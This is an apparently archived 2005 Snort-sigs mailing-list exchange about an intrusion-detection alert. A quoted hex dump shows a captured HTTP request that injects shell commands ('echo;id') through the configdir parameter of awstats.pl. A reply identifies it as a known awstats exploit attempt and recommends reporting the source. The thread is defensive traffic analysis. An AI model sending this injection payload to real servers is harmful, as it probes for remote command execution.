[Snort-sigs] Exploit attempt?

Chris Kronberg smil at ...1754...
Tue Apr 5 06:21:05 EDT 2005


On Mon, 4 Apr 2005, Giles Coochey wrote:

> 
> I saw the "WEB-ATTACKS id command attempt" triggered today, with the
> following in the payload:
>
> 000 : 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 61 77 73   GET /cgi-bin/aws
> 010 : 74 61 74 73 2E 70 6C 3F 63 6F 6E 66 69 67 64 69   tats.pl?configdi
> 020 : 72 3D 7C 65 63 68 6F 25 32 30 3B 65 63 68 6F 25   r=|echo%20;echo%
> 030 : 32 30 3B 69 64 3B 65 63 68 6F 25 32 30 3B 65 63   20;id;echo%20;ec
> 040 : 68 6F 7C 20 48 54 54 50 2F 31 2E 31 0D 0A         ho| HTTP/1.1..
>
> Does that look like an awstats exploit attempt?

   Yes. I see them for several weeks now.

> Does anyone have a vulnerability report on this?

   See bugtrag in January:
   http://www.securityfocus.com/bid/12298
   The attacks started soon after that.

> Should I attempt to report the source address to the appropriate
> authority I get through a whois query?

   Sure.

   Cheers,

   Chris Kronberg.




More information about the Snort-sigs mailing list